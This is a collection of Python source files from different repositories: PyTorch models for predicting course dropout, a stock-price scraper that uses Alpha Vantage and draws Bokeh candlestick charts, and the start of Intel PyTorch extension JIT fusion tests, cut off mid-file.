x3 = self.conv3(x)#.squeeze(2) # shape = (64, num_channels, 1)(squeeze 2)
x3 = self.ReLU_activation(x3)
x3 = self.maxpool3(x3)
x3 = x3.squeeze(2)
all_out = torch.cat((x1, x2, x3), dim=1)
# print(all_out.shape)
info_fusion = self.tanh_activation(self.fc1(all_out))
info_fusion = self.tanh_activation(self.fc2(info_fusion))
final_out = self.fc3(info_fusion)
# result = self.softmax(final_out)
result = self.sigmoid(final_out)
return result # 返回 softmax 的结果
model_CNN = TextCNN()
model_CNN.load_state_dict(torch.load('textcnn_25epoch.model'))
model_CNN.eval()
def prediction_train_seperately(course_vecs_CNN):
course_id = []
video_id = []
continues_feature = []
#get x for CNN
course_list = course_vecs_CNN
course_id_CNN = []
video_id = []
continues_feature2 = []
for i in range(len(course_list)): #get a course
c = course_list[i]
course_cat1 = []
course_cat2 = []
course_con = []
for j in range(len(c)): #get a subject
s = c[j]
cat_feture1 = s[0] #get course_id and video_id
cat_feture2 = s[1]
course_cat1.append(cat_feture1)
course_cat2.append(cat_feture2)
con_feture = s[2:] #get continues features
course_con.append(con_feture)
if len(course_cat1)<sequence_len:
length = sequence_len - len(course_cat1)
temp_course_id = [706] * length
temp_video_id = [38180] * length
temp2 = [[0,0,0,0,0,0,0,0,0,0,0,0,0]] * length
course_cat1 = course_cat1 + temp_course_id
course_cat2 = course_cat2 + temp_video_id
course_con = course_con + temp2
course_id_CNN.append(course_cat1)
video_id.append(course_cat2)
continues_feature2.append(course_con)
# to tensor
continues_feature2 = torch.tensor(continues_feature2)
course_id_CNN = torch.tensor(course_id_CNN).clone().long()
video_id = torch.tensor(video_id).clone().long()
predictions_gru = model_BiGRU(course_id_CNN,video_id,continues_feature2)
predictions = torch.flatten(predictions_gru)
results_prob = predictions.detach().numpy().tolist()
return results_prob
def merge_results(result1,result2):
result = []
for i in range(len(result1)):
result.append( int(np.round((result1[i]+result2[i])/2)) )
return result
def merge_results_prob(result1,result2):
result = []
for i in range(len(result1)):
result.append( (result1[i]+result2[i])/2 )
return result
test_set['gbdt_result'] = test_set.progress_apply(lambda row: gbdt_prediction(row['course_ids'],row['video_ids'],row['watching_counts'],row['video_durations'],row['local_watching_times'],row['video_progress_times'],
row['video_start_times'], row['video_end_times'], row['local_start_times'],row['local_end_times'],row['courseListIDs']), axis=1)
test_set['textcnn_result'] = test_set['course_vecs_CNN'].progress_apply(lambda x : prediction_train_seperately(x))
test_set['predictions'] = test_set.progress_apply(lambda row: merge_results(row['textcnn_result'],row['gbdt_result']), axis=1)
test_set['predictions_prob'] = test_set.progress_apply(lambda row: merge_results_prob(row['textcnn_result'],row['gbdt_result']), axis=1)
final_result = test_set[['predictions']].values.tolist()
final_result_prob = test_set[['predictions_prob']].values.tolist()
ground_truth = test_set[['label_list']].values.tolist()
# test = final_result.values.tolist()
final_result = [ item for elem in final_result for item in elem]
final_result = [ item for elem in final_result for item in elem]
final_result_prob = [ item for elem in final_result_prob for item in elem]
final_result_prob = [ item for elem in final_result_prob for item in elem]
ground_truth = [ item for elem in ground_truth for item in elem]
ground_truth = [ item for elem in ground_truth for item in elem]
acc = calculate_acc(final_result,ground_truth)
auc = roc_auc_score(ground_truth, final_result_prob)
f1=f1_score(ground_truth, final_result, average='macro')
```
#### File: JiayinL/Dropout-Prediction/LR_GRU.py
```python
import pandas as pd
import pandas_profiling
from sklearn.preprocessing import LabelEncoder
from tqdm import tqdm
from joblib import Parallel,delayed
import numpy as np
import json
import re
import time
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.optim as optim
import torch.utils.data
from torch.autograd import Variable
import torch.nn.utils.rnn as rnn_utils
from sklearn.utils import shuffle
def time_transform(t):
# 先转换为时间数组
timeArray = time.strptime(t, "%Y-%m-%d %H:%M:%S")
# 转换为时间戳
timeStamp = int(time.mktime(timeArray))
return timeStamp
def Z_score(mean_, std_,x):
return (x-mean_)/std_
def max_mean_std(data):
return np.max(data), np.mean(data), np.std(data)
def calculate_acc(predictions, truth):
hit = 0
for i in range(len(predictions)):
if predictions[i] == truth[i]:
hit = hit +1
return hit/len(predictions)
train_set_course_vec = pd.read_csv('train_set_course_vec.csv',converters={'label_list': eval, 'course_vecs_CNN':eval, 'course_vecs_LR':eval})
test_set_course_vec = pd.read_csv('test_set_course_vec.csv',converters={'label_list': eval, 'course_vecs_CNN':eval, 'course_vecs_LR':eval})
def training_data_prep():
course_id = []
video_id = []
continues_feature1 = []
data = train_set_course_vec[['label_list','course_vecs_LR','course_vecs_CNN']]
data = shuffle(data) #Shuffle data
#get y
labels = data['label_list'].values.tolist()
y = [ item for elem in labels for item in elem]
#get x for LR
course_info_LR = data['course_vecs_LR'].values.tolist()
course_id_LR = []
continues_feature1 = []
for i in range(len(course_info_LR)): #get a course
c = course_info_LR[i]
course_cat1 = []
course_con = []
for j in range(len(c)): #get a subject
s = c[j]
cat_feture1 = s[0] #get course_id and video_id
course_cat1.append(cat_feture1)
con_feture = s[1:] #get continues features
course_con.append(con_feture)
course_id_LR.append(course_cat1)
continues_feature1.append(course_con)
#get x for CNN
course_info_CNN = data['course_vecs_CNN'].values.tolist()
course_list = [ item for elem in course_info_CNN for item in elem]
# print(course_list[0][0])
course_id_CNN = []
video_id = []
continues_feature2 = []
for i in range(len(course_list)): #get a course
c = course_list[i]
course_cat1 = []
course_cat2 = []
course_con = []
for j in range(len(c)): #get a subject
s = c[j]
cat_feture1 = s[0] #get course_id and video_id
cat_feture2 = s[1]
course_cat1.append(cat_feture1)
course_cat2.append(cat_feture2)
con_feture = s[2:] #get continues features
course_con.append(con_feture)
if len(course_cat1)<sequence_len:
length = sequence_len - len(course_cat1)
temp_course_id = [706] * length
temp_video_id = [38180] * length
temp2 = [[0,0,0,0,0,0,0,0,0,0,0,0,0]] * length
course_cat1 = course_cat1 + temp_course_id
course_cat2 = course_cat2 + temp_video_id
course_con = course_con + temp2
course_id_CNN.append(course_cat1)
video_id.append(course_cat2)
continues_feature2.append(course_con)
# to tensor
continues_feature1 = [ item for elem in continues_feature1 for item in elem]
course_id_LR = [ item for elem in course_id_LR for item in elem]
continues_feature1 = torch.tensor(continues_feature1)
course_id_LR = torch.tensor(course_id_LR)
continues_feature2 = torch.tensor(continues_feature2)
course_id_CNN = torch.tensor(course_id_CNN)
video_id = torch.tensor(video_id)
y = torch.tensor(y)
return continues_feature1,continues_feature2,course_id_LR,course_id_CNN,video_id,y
def test_data_prep():
course_id = []
video_id = []
continues_feature = []
data = test_set_course_vec[['label_list','course_vecs_LR','course_vecs_CNN']]
labels = data['label_list'].values.tolist()
y = [ item for elem in labels for item in elem]
#get x for LR
course_info_LR = data['course_vecs_LR'].values.tolist()
course_id_LR = []
continues_feature1 = []
for i in range(len(course_info_LR)): #get a course
c = course_info_LR[i]
course_cat1 = []
course_con = []
for j in range(len(c)): #get a subject
s = c[j]
cat_feture1 = s[0] #get course_id and video_id
course_cat1.append(cat_feture1)
con_feture = s[1:] #get continues features
course_con.append(con_feture)
course_id_LR.append(course_cat1)
continues_feature1.append(course_con)
#get x for CNN
course_info_CNN = data['course_vecs_CNN'].values.tolist()
course_list = [ item for elem in course_info_CNN for item in elem]
# print(course_list[0][0])
course_id_CNN = []
video_id = []
continues_feature2 = []
for i in range(len(course_list)): #get a course
c = course_list[i]
course_cat1 = []
course_cat2 = []
course_con = []
for j in range(len(c)): #get a subject
s = c[j]
cat_feture1 = s[0] #get course_id and video_id
cat_feture2 = s[1]
course_cat1.append(cat_feture1)
course_cat2.append(cat_feture2)
con_feture = s[2:] #get continues features
course_con.append(con_feture)
if len(course_cat1)<sequence_len:
length = sequence_len - len(course_cat1)
temp_course_id = [706] * length
temp_video_id = [38180] * length
temp2 = [[0,0,0,0,0,0,0,0,0,0,0,0,0]] * length
course_cat1 = course_cat1 + temp_course_id
course_cat2 = course_cat2 + temp_video_id
course_con = course_con + temp2
course_id_CNN.append(course_cat1)
video_id.append(course_cat2)
continues_feature2.append(course_con)
# to tensor
continues_feature1 = [ item for elem in continues_feature1 for item in elem]
course_id_LR = [ item for elem in course_id_LR for item in elem]
continues_feature1 = torch.tensor(continues_feature1)
course_id_LR = torch.tensor(course_id_LR)
continues_feature2 = torch.tensor(continues_feature2)
course_id_CNN = torch.tensor(course_id_CNN)
video_id = torch.tensor(video_id)
y = torch.tensor(y)
return continues_feature1,continues_feature2,course_id_LR,course_id_CNN,video_id,y
def prediction(course_vecs_LR,course_vecs_CNN):
course_id = []
video_id = []
continues_feature = []
#get x for LR
course_info_LR = course_vecs_LR
course_id_LR = []
continues_feature1 = []
for i in range(len(course_info_LR)): #get a course
c = course_info_LR[i]
cat_feture1 = c[0] #get course_id and video_id
con_feture = c[1:] #get continues features
course_id_LR.append(cat_feture1)
continues_feature1.append(con_feture)
#get x for CNN
# course_info_CNN = course_vecs_CNN
course_list = course_vecs_CNN
# print(course_list[0][0])
course_id_CNN = []
video_id = []
continues_feature2 = []
for i in range(len(course_list)): #get a course
c = course_list[i]
course_cat1 = []
course_cat2 = []
course_con = []
for j in range(len(c)): #get a subject
s = c[j]
cat_feture1 = s[0] #get course_id and video_id
cat_feture2 = s[1]
course_cat1.append(cat_feture1)
course_cat2.append(cat_feture2)
con_feture = s[2:] #get continues features
course_con.append(con_feture)
if len(course_cat1)<sequence_len:
length = sequence_len - len(course_cat1)
temp_course_id = [706] * length
temp_video_id = [38180] * length
temp2 = [[0,0,0,0,0,0,0,0,0,0,0,0,0]] * length
course_cat1 = course_cat1 + temp_course_id
course_cat2 = course_cat2 + temp_video_id
course_con = course_con + temp2
course_id_CNN.append(course_cat1)
video_id.append(course_cat2)
continues_feature2.append(course_con)
# to tensor
continues_feature1 = [ item for elem in continues_feature1 for item in elem]
course_id_LR = [ item for elem in course_id_LR for item in elem]
continues_feature1 = torch.tensor(continues_feature1)
course_id_LR = torch.tensor(course_id_LR)
continues_feature2 = torch.tensor(continues_feature2)
course_id_CNN = torch.tensor(course_id_CNN)
video_id = torch.tensor(video_id)
y = torch.tensor(y)
return continues_feature1,continues_feature2,course_id_LR,course_id_CNN,video_id,y
nb_courses = 706+1
course_emb_size = 5
nb_videos = 38181+1
video_emb_size = 15
sequence_len = 70
# in_channel =
feature_size2 = course_emb_size + video_emb_size + 13
feature_size1 = course_emb_size + 42
hidden_dim = 64
num_of_lstm_layer = 1
class LR_GRU(nn.Module):
def __init__(self):
super(LR_GRU, self).__init__()
self.course_embedding = torch.nn.Embedding(nb_courses, course_emb_size)
self.video_embedding = torch.nn.Embedding(nb_videos, video_emb_size)
self.bi_gru = nn.GRU(input_size = feature_size2, hidden_size = hidden_dim // 2, num_layers=num_of_lstm_layer, bidirectional=True)
self.lr_fc = nn.Linear(feature_size1, 1)
self.fc1 = nn.Linear(hidden_dim, 32)
self.fc2 = nn.Linear(32, 16)
self.fc3 = nn.Linear(16, 1)
self.ReLU_activation = nn.ReLU()
self.tanh_activation = nn.Tanh()
self.sigmoid_activation = nn.Sigmoid()
self.final_fc = nn.Linear(2, 1)
def forward(self, courseid_LR,courseid_CNN,continuesfeature1,continuesfeature2,videoid):
#course_id (batch_size, max_sen_len)
#continues (batch_size, max_sen_len, feature_size)
emb1_LR = self.course_embedding(courseid_LR)
emb1_CNN = self.course_embedding(courseid_CNN)# (batch_size,max_sen_len, embed_size)
emb2 = self.video_embedding(videoid)
# LR part
LR_x = torch.cat([emb1_LR,continuesfeature1], 1)
LR_result = self.sigmoid_activation(self.lr_fc(LR_x))
#GRU part
GRU_x = torch.cat([emb1_CNN,emb2,continuesfeature2], 2)
GRU_x = GRU_x.permute(1, 0, 2) # Batch_size * (feature_dim) * max_sen_len
bigru_out, _ = self.bi_gru(GRU_x)
output = bigru_out[-1]
info_fusion = self.tanh_activation(self.fc1(output))
info_fusion = self.tanh_activation(self.fc2(info_fusion))
final_out = self.fc3(info_fusion)
GRU_result = self.sigmoid_activation(final_out)
#combine two result
final_input = torch.cat((LR_result, GRU_result), dim=1)
result = self.sigmoid_activation(self.final_fc(final_input))
return result,LR_result,GRU_result
class LR_single_direc_GRU(nn.Module):
def __init__(self):
super(LR_single_direc_GRU, self).__init__()
self.course_embedding = torch.nn.Embedding(nb_courses, course_emb_size)
self.video_embedding = torch.nn.Embedding(nb_videos, video_emb_size)
self.bi_gru = nn.GRU(input_size = feature_size2, hidden_size = hidden_dim , num_layers=num_of_lstm_layer, bidirectional=False)
self.lr_fc = nn.Linear(feature_size1, 1)
self.fc1 = nn.Linear(hidden_dim, 16)
self.fc2 = nn.Linear(16, 8)
self.fc3 = nn.Linear(8, 1)
self.ReLU_activation = nn.ReLU()
self.tanh_activation = nn.Tanh()
self.sigmoid_activation = nn.Sigmoid()
self.final_fc = nn.Linear(2, 1)
def forward(self, courseid_LR,courseid_CNN,continuesfeature1,continuesfeature2,videoid):
#course_id (batch_size, max_sen_len)
#continues (batch_size, max_sen_len, feature_size)
emb1_LR = self.course_embedding(courseid_LR)
emb1_CNN = self.course_embedding(courseid_CNN)# (batch_size,max_sen_len, embed_size)
emb2 = self.video_embedding(videoid)
# LR part
LR_x = torch.cat([emb1_LR,continuesfeature1], 1)
LR_result = self.sigmoid_activation(self.lr_fc(LR_x))
#GRU part
GRU_x = torch.cat([emb1_CNN,emb2,continuesfeature2], 2)
GRU_x = GRU_x.permute(1, 0, 2) # Batch_size * (feature_dim) * max_sen_len
bigru_out, _ = self.bi_gru(GRU_x)
output = bigru_out[-1]
info_fusion = self.tanh_activation(self.fc1(output))
info_fusion = self.tanh_activation(self.fc2(info_fusion))
final_out = self.fc3(info_fusion)
GRU_result = self.sigmoid_activation(final_out)
#combine two result
final_input = torch.cat((LR_result, GRU_result), dim=1)
result = self.sigmoid_activation(self.final_fc(final_input))
return result,LR_result,GRU_result
model = LR_single_direc_GRU()
optimizer = optim.Adam(model.parameters(), lr=0.001)
# MSELoss = nn.MSELoss()
MSELoss = nn.BCELoss()
epoach_count = 15 #40
batchSize = 512
loss_value = []
acc_value = []
times = []
for m in model.modules():
if isinstance(m, (nn.Conv1d, nn.Linear)):
nn.init.xavier_uniform_(m.weight)
test_continues_feature1,test_continues_feature2,test_course_id_LR,test_course_id_CNN,test_video_id,ground_truth = test_data_prep()
ground_truth = ground_truth.detach().numpy().tolist()
for epoach in range(epoach_count):
start = time.time()
continues_feature1,continues_feature2,course_id_LR,course_id_CNN,video_id,y = training_data_prep()
numOfMinibatches = int(len(course_id_CNN) / batchSize) + 1
numOfLastMinibatch = len(course_id_CNN) % batchSize
# loss_value = []
for batchID in range(numOfMinibatches):
if batchID == numOfMinibatches-1:
numbOfBatches = numOfLastMinibatch
else:
numbOfBatches = batchSize
leftIndex = batchID * batchSize
rightIndex = leftIndex + numbOfBatches
courseid_LR = course_id_LR[leftIndex: rightIndex].clone().long()
videoid = video_id[leftIndex: rightIndex].clone().long()
continuesfeature1 = continues_feature1[leftIndex: rightIndex].clone()
courseid_CNN = course_id_CNN[leftIndex: rightIndex].clone().long()
continuesfeature2 = continues_feature2[leftIndex: rightIndex].clone()
predictions,LR_result,GRU_result = model(courseid_LR,courseid_CNN,continuesfeature1,continuesfeature2,videoid)
predictions = torch.flatten(predictions)
LR_result = torch.flatten(LR_result)
GRU_result = torch.flatten(GRU_result)
loss_final = MSELoss(predictions,y[leftIndex: rightIndex].float())
loss_lr = MSELoss(LR_result,y[leftIndex: rightIndex].float())
loss_gru = MSELoss(GRU_result,y[leftIndex: rightIndex].float())
# print('loss: ',loss)
loss = loss_final + loss_lr +loss_gru
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss_value.append(loss.item())
#testing
if(batchID%100==0):
test_numOfMinibatches = int(len(test_course_id_LR) / batchSize) + 1
test_numOfLastMinibatch = len(test_course_id_LR) % batchSize
results = []
for test_batchID in range(test_numOfMinibatches):
if test_batchID == test_numOfMinibatches-1:
test_numbOfBatches = test_numOfLastMinibatch
else:
test_numbOfBatches = batchSize
test_leftIndex = test_batchID * batchSize
test_rightIndex = test_leftIndex + test_numbOfBatches
test_courseid_LR = test_course_id_LR[test_leftIndex: test_rightIndex].clone().long()
test_videoid = test_video_id[test_leftIndex: test_rightIndex].clone().long()
test_continuesfeature1 = test_continues_feature1[test_leftIndex: test_rightIndex].clone()
test_courseid_CNN = test_course_id_CNN[test_leftIndex: test_rightIndex].clone().long()
test_continuesfeature2 = test_continues_feature2[test_leftIndex: test_rightIndex].clone()
test_predictions,_,_ = model(test_courseid_LR,test_courseid_CNN,test_continuesfeature1,test_continuesfeature2,test_videoid)
test_predictions = torch.round(torch.flatten(test_predictions))
results.append(test_predictions.detach().numpy().tolist())
result = [ item for elem in results for item in elem]
# ground_truth = ground_truth.detach().numpy().tolist()
acc = calculate_acc(result,ground_truth)
acc_value.append(acc)
print('Epoch[{}/{}],loss:{:.4f},loss_final:{:.4f},loss_LR:{:.4f},loss_GRU:{:.4f},acc:{:.4f}'.format(epoach, epoach_count,loss.item(),loss_final.item(),loss_lr.item(),loss_gru.item(),acc))
# batchIndex = batchList[leftIndex: rightIndex]
end = time.time()
interval = end-start
times.append(interval)
print('time:{:.4f}'.format(interval))
torch.save(model.state_dict(), 'lr_gru.model')
``` |
{
"source": "jiayi-ren/stock-scraper",
"score": 3
} |
#### File: jiayi-ren/stock-scraper/scraper.py
```python
import alpha_vantage
from alpha_vantage.timeseries import TimeSeries
import datetime,os,sys,pandas
import bokeh
from bokeh.plotting import figure,show,save,output_file
API_Key = pandas.read_csv("Alpha Vantage API key.txt")
ts = TimeSeries(key='API_Key', output_format = 'pandas')
################### Stock data scraper ############
def intraday(stock,interval,size):
data, meta_data = ts.get_intraday(symbol=stock,interval=interval, outputsize=size)
def daily(stock,size):
data, meta_data = ts.get_daily(symbol=stock, outputsize=size)
return data
def weekly(stock,size):
data, meta_data = ts.get_weekly(symbol=stock, outputsize=size)
def monthly(stock,size):
data, meta_data = ts.get_weekly(symbol=stock, outputsize=size)
################### User Input ####################
try:
stock = input("Enter Stock Symbol: ") #stock symbol e.g. SPY
duration = input("Choose Time Frame (intraday/daily/weekly/monthly): ")
if duration == "intraday" :
interval = input("Choose interval (1min, 5min, 15min, 30min) :") #1min,5min, 15min, 30min, 60min
size = input("Choose data size (compact, full)\n" +
"##compact:latest 100 data points##\n##full:all available datapoints##\ncompact or full? ") #compact:latest 100 data points, full:all available datapoints
if size != ("compact" or "full"):
size = input("Re-choose compact or full: ")
df=daily(stock,size)
####### Invalid stock symbol check ###############
except ValueError:
print("\nInvalid stock symbol")
sys.exit()
df.columns=['open','high','low','close','volume']
df.index =pandas.to_datetime(df.index, format='%Y-%m-%d')
########### stock data output file ###################
datafile = input("Enter a output data file name: ")
df.to_csv(datafile +".csv")
################## Bokeh Graph saved to HTML file ##############
htmlfilename=input("Enter graph file name otherwise N/A: ")
def inc_dec(c, o):
if c > o:
value="Up"
elif c < o:
value="Down"
else:
value="Equal"
return value
def bokeh_graph(htmlfile= "N/A"):
df["Status"]=[inc_dec(c, o) for c, o in zip(df.close,df.open)]
df["Middle"]=(df.open+df.close)/2
df["Height"]=abs(df.open-df.close)
p=figure(x_axis_type='datetime',plot_width=500,plot_height=300, sizing_mode="scale_width")
p.title.text="Candlestick chart"
p.grid.grid_line_alpha=0
p.segment(df.index,df.high,df.index,df.low,color="Black")
hours_12=12*60*60*1000
p.rect(df.index[df.Status=='Up'],df.Middle[df.Status=="Up"], hours_12,
df.Height[df.Status=='Up'],fill_color="green",line_color="black")
p.rect(df.index[df.Status=='Down'],df.Middle[df.Status=="Down"], hours_12,
df.Height[df.Status=='Down'],fill_color="red",line_color="black")
if "N/A" in htmlfile.upper():
pass
else:
output_file(htmlfile+".html")
save(p)
bokeh_graph(htmlfilename)
``` |
{
"source": "jiayisunx/intel-extension-for-pytorch",
"score": 2
} |
#### File: tests/cpu/test_jit.py
```python
from __future__ import division
from __future__ import print_function
'''
From PyTorch:
Copyright (c) 2016- Facebook, Inc (<NAME>)
Copyright (c) 2014- Facebook, Inc (<NAME>)
Copyright (c) 2011-2014 Idiap Research Institute (<NAME>)
Copyright (c) 2012-2014 Deepmind Technologies (Koray Kavukcuoglu)
Copyright (c) 2011-2012 NEC Laboratories America (Koray Kavukcuoglu)
Copyright (c) 2011-2013 NYU (<NAME>)
Copyright (c) 2006-2010 NEC Laboratories America (<NAME>, <NAME>, <NAME>, <NAME>)
Copyright (c) 2006 Idiap Research Institute (<NAME>)
Copyright (c) 2001-2004 Idiap Research Institute (<NAME>, <NAME>, <NAME>)
From Caffe2:
Copyright (c) 2016-present, Facebook Inc. All rights reserved.
All contributions by Facebook:
Copyright (c) 2016 Facebook Inc.
All contributions by Google:
Copyright (c) 2015 Google Inc.
All rights reserved.
All contributions by Yangqing Jia:
Copyright (c) 2015 Yang<NAME>
All rights reserved.
All contributions from Caffe:
Copyright(c) 2013, 2014, 2015, the respective contributors
All rights reserved.
All other contributions:
Copyright(c) 2015, 2016 the respective contributors
All rights reserved.
Caffe2 uses a copyright model similar to Caffe: each contributor holds
copyright over their contributions to Caffe2. The project versioning records
all such contribution and copyright details. If a contributor wants to further
mark their specific copyright on a particular contribution, they should
indicate their copyright solely in the commit message of the change when it is
committed.
All rights reserved.
'''
"""Tests for rn50."""
import math
import random
import unittest
from functools import reduce
import torch
import torch.nn as nn
from torch.jit._recursive import wrap_cpp_module
import copy
import intel_pytorch_extension as ipex
from intel_pytorch_extension import core
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torch.nn import Parameter
import torch.nn.functional as F
from torch.autograd import gradcheck
from torch.autograd.gradcheck import gradgradcheck
from torch._six import inf, nan
from common_utils import TestCase, iter_indices, TEST_NUMPY, TEST_SCIPY, TEST_MKL, \
TEST_LIBROSA, run_tests, download_file, skipIfNoLapack, suppress_warnings, \
IS_WINDOWS, PY3, NO_MULTIPROCESSING_SPAWN, do_test_dtypes, do_test_empty_full, \
IS_SANDCASTLE, load_tests, brute_pdist, brute_cdist, slowTest, \
skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf
device = ipex.DEVICE
#device = 'cpu:0'
SIZE = 100
conv_module = {2 : torch.nn.Conv2d, 3 : torch.nn.Conv3d}
bn_module = {2 : torch.nn.BatchNorm2d, 3 : torch.nn.BatchNorm3d}
class ConvBatchNorm_Fixed(nn.Module):
def __init__(self, dim, in_channels, out_channels, **kwargs):
super(ConvBatchNorm_Fixed, self).__init__()
seed = 2018
torch.manual_seed(seed)
self.conv = conv_module[dim](in_channels, out_channels, bias=False, **kwargs)
self.bn = bn_module[dim](out_channels, eps=0.001)
def forward(self, x):
return self.bn(self.conv(x))
class ConvRelu_Fixed(nn.Module):
def __init__(self, dim, in_channels, out_channels, **kwargs):
super(ConvRelu_Fixed, self).__init__()
seed = 2018
torch.manual_seed(seed)
self.conv = conv_module[dim](in_channels, out_channels, bias=False, **kwargs)
def forward(self, x):
return F.relu(self.conv(x), inplace=True)
class ConvSum(nn.Module):
def __init__(self, dim, in_channels, out_channels, **kwargs):
super(ConvSum, self).__init__()
seed = 2018
torch.manual_seed(seed)
self.conv = conv_module[dim](in_channels, out_channels, bias=False, **kwargs)
self.conv1 = conv_module[dim](in_channels, out_channels, bias=False, **kwargs)
def forward(self, x):
a = self.conv(x)
b = self.conv1(x)
return a+b
class CascadedConvBnSumRelu(nn.Module):
def __init__(self, dim, in_channels, mid_channels, out_channels, **kwargs):
super(CascadedConvBnSumRelu, self).__init__()
torch.manual_seed(2018)
self.conv = conv_module[dim](in_channels, mid_channels, bias=False, **kwargs)
self.conv1 = conv_module[dim](
mid_channels, out_channels, bias=False, padding=1, **kwargs)
self.conv2 = conv_module[dim](in_channels, out_channels, bias=False, **kwargs)
self.bn = bn_module[dim](mid_channels, eps=0.001)
self.bn1 = bn_module[dim](out_channels, eps=0.001)
self.bn2 = bn_module[dim](out_channels, eps=0.001)
def forward(self, x):
a = self.conv(x)
a = self.bn(a)
a = F.relu(a, inplace=True)
a = self.conv1(a)
a = self.bn1(a)
b = self.conv2(x)
b = self.bn2(b)
return F.relu(a.add_(b), inplace=True)
class LinearRelu(nn.Module):
def __init__(self, in_channels, out_channels, **kwargs):
super(LinearRelu, self).__init__()
seed = 2018
torch.manual_seed(seed)
self.linear = nn.Linear(in_channels, out_channels, **kwargs)
def forward(self, x):
return F.relu(self.linear(x), inplace=True)
class ConvSumInDiffBlock(nn.Module):
def __init__(self, dim, in_channels, out_channels, **kwargs):
super(ConvSumInDiffBlock, self).__init__()
seed = 2018
torch.manual_seed(seed)
self.conv = conv_module[dim](in_channels, out_channels, bias=False, **kwargs)
def forward(self, x):
y = self.conv(x)
if y.size(1) != x.size(1):
y += F.pad(x,
(0, 0, 0, 0, 0, y.size(1) - x.size(1)), 'constant', 0.)
else:
y += x
return y
class Tester(TestCase):
def _test_output(self, model, x, kind_in_graph=None, kind_not_in_graph=None):
modelName = model.__class__.__name__
core.disable_jit_opt()
core.disable_mix_bf16_fp32()
model = model.to(device).eval()
x = x.to(device)
with torch.no_grad():
result = model(x)
script_model = torch.jit.script(model)
script_model.eval()
trace_model = torch.jit.trace(model, x)
trace_model.eval()
with torch.no_grad():
sresult = script_model(x)
tresult = trace_model(x)
self.assertEqual(result, sresult)
self.assertEqual(result, tresult)
core.enable_jit_opt()
script_fused_model = torch.jit.script(model)
trace_fused_model = torch.jit.trace(model, x)
with torch.no_grad():
# conv relu fusion, conv sum fusion or conv sum relu fusion
script_graph = script_fused_model.graph_for(x)
fused_sresult = script_fused_model(x)
trace_graph = trace_fused_model.graph_for(x)
fused_tresult = trace_fused_model(x)
self.assertEqual(result, fused_sresult)
self.assertEqual(result, fused_tresult)
# check if the fused node exists in the graph
if kind_in_graph is not None:
self.assertTrue(any(n.kind() == kind_in_graph for n in script_graph.nodes()))
self.assertTrue(any(n.kind() == kind_in_graph for n in trace_graph.nodes()))
# check if certain node does not exist in the graph
if kind_not_in_graph is not None:
self.assertTrue(all(n.kind() != kind_not_in_graph for n in script_graph.nodes()))
self.assertTrue(all(n.kind() != kind_not_in_graph for n in trace_graph.nodes()))
def _test_output_bf16(self, model, x, kind_in_graph=None, kind_not_in_graph=None, prec=None):
modelName = model.__class__.__name__
core.enable_auto_dnnl()
core.enable_jit_opt()
core.enable_mix_bf16_fp32()
model = model.to(ipex.DEVICE).eval()
x = x.to(ipex.DEVICE)
x2 = x.clone()
x3 = x.clone()
script_fused_model = torch.jit.script(copy.deepcopy(model))
trace_fused_model = torch.jit.trace(copy.deepcopy(model), x3)
with torch.no_grad():
# bf16, native path
result = model(x)
# bf16, jit script path
script_graph = script_fused_model.graph_for(x2)
fused_sresult = script_fused_model(x2)
# bf 16, jit trace path
trace_graph = trace_fused_model.graph_for(x3)
fused_tresult = trace_fused_model(x3)
# disable mix_bf16_fp32 when the calculation is done
# to avoid affecting other scripts
core.disable_mix_bf16_fp32()
self.assertEqual(fused_sresult, result, prec=prec)
self.assertEqual(fused_tresult, result, prec=prec)
# check if the fused node exists in the graph
if kind_in_graph is not None:
self.assertTrue(any(n.kind() == kind_in_graph for n in script_graph.nodes()))
self.assertTrue(any(n.kind() == kind_in_graph for n in trace_graph.nodes()))
# check if certain node does not exist in the graph
if kind_not_in_graph is not None:
self.assertTrue(all(n.kind() != kind_not_in_graph for n in script_graph.nodes()))
self.assertTrue(all(n.kind() != kind_not_in_graph for n in trace_graph.nodes()))
def test_output_conv_bn_2d(self):
self._test_output(
ConvBatchNorm_Fixed(2, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 64, 64),
kind_in_graph="aten::conv2d",
kind_not_in_graph="aten::batch_norm",)
self._test_output_bf16(
ConvBatchNorm_Fixed(2, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 64, 64),
kind_in_graph="aten::conv2d",
kind_not_in_graph="aten::batch_norm",
prec=0.02)
def test_output_conv_bn_3d(self):
self._test_output(
ConvBatchNorm_Fixed(3, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 32, 32, 32),
kind_in_graph="aten::conv3d",
kind_not_in_graph="aten::batch_norm",)
self._test_output_bf16(
ConvBatchNorm_Fixed(3, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 32, 32, 32),
kind_in_graph="aten::conv3d",
kind_not_in_graph="aten::batch_norm",
prec=0.02)
def test_output_conv_relu_2d(self):
self._test_output(
ConvRelu_Fixed(2, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 64, 64),
kind_in_graph="ipex::conv2d_relu")
self._test_output_bf16(
ConvRelu_Fixed(2, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 64, 64),
kind_in_graph="ipex::conv2d_relu")
def test_output_conv_relu_3d(self):
self._test_output(
ConvRelu_Fixed(3, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 32, 32, 32),
kind_in_graph="ipex::conv3d_relu")
self._test_output_bf16(
ConvRelu_Fixed(3, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 32, 32, 32),
kind_in_graph="ipex::conv3d_relu")
def test_output_conv_sum_2d(self):
self._test_output(
ConvSum(2, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 64, 64),
kind_in_graph="ipex::conv2d_sum")
self._test_output_bf16(
ConvSum(2, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 64, 64),
kind_in_graph="ipex::conv2d_sum",
prec=0.04)
def test_output_conv_sum_3d(self):
self._test_output(
ConvSum(3, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 32, 32, 32),
kind_in_graph="ipex::conv3d_sum")
self._test_output_bf16(
ConvSum(3, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 32, 32, 32),
kind_in_graph="ipex::conv3d_sum",
prec=0.04)
def test_output_cascaded_conv_bn_sum_relu_2d(self):
self._test_output(
